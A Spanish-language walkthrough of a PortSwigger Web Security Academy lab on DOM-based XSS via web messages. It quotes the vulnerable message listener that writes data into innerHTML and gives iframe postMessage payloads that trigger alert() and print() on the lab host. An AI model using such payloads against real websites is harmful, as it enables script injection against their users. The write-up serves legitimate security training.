Lab 1: DOM XSS using web messages

https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages

Primero analizamos el codigo fuente y se detecta un codigo javascript interesante:

<!-- Ads to be inserted here -->
<div id='ads'></div>
<script>
window.addEventListener('message', function(e) {
  document.getElementById('ads').innerHTML = e.data;
})
</script>

La función innerHTML asigna directamente el contenido HTML al elemento div con id ads.
Si el contenido (e.data) incluye código HTML o JavaScript, este será interpretado y ejecutado por el navegador.

Teniendo en cuenta lo anterior y adicionalmente la ausencia de la cabecera de x-frame-options:

HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 11084

Se procede a crear un HTML con el siguiente payload:

<iframe src="https://0a6f00e203d49a2b80f7121800fe00bb.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(2024)>','*')">

Y lo anterior, nos genera el siguiente comportamiento:

El siguiente payload nos ayudara a resolver el ejercicio:

<iframe src="https://0a6f00e203d49a2b80f7121800fe00bb.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

AnteriorLab 1: Basic server-side template injection SiguienteLab 2: DOM XSS using web messages and a JavaScript URL

Última actualización hace 1 año